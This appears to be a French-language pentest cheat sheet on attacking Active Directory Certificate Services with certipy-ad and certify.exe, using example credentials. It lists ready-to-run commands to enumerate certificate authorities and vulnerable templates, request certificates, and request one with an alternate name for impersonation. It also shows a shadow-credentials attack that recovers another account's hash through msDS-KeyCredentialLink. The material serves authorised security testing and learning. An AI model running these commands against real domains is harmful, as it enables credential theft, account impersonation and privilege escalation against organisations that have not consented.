Enumeration

Utilisation de Certipy-ad ou certify.exe afin d'interragir avec le serveur de certificat.

Différentes vulnérabilités

🐧 Linux (certipy-ad)

Installation:

pip install certipy-ad

Enumération des certificats:

certipy-ad find -u [email protected] -p Passw0rd -dc-ip 172.16.126.128

# Possibilité de récupérer les informations pour bloodhound:

certipy-ad find -u [email protected] -p Passw0rd -bloodhound -dc-ip 172.16.126.128

Faire une demande de certificat (ici une demande du certificat User, sur le serveur de certificat corp-DC-CA et l'utilisateur john):

certipy-ad req -username [email protected] -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template User

Si, dans bloodhound, on voit qu'un utilisateur peut écrire sur l'attribut msDS-KeyCredentialLink d'un autre compte, il est possible de récupérer le hash de cet autre compte (ici John peut écrire sur Jane):

certipy shadow auto -username [email protected] -p Passw0rd -account Jane

---

🍔 Windows (certify.exe)

Enumération des certificats:

certify.exe cas

Enumérer les templates:

certify.exe find

Enumérer les templates vulnérables aux différentes attaques :

certify.exe find /vulnerable

Demander un certificat:

certify.exe /ca:host-serveur-certficat\DC-CA /template:certificat-vuln /altname:nom-alternatif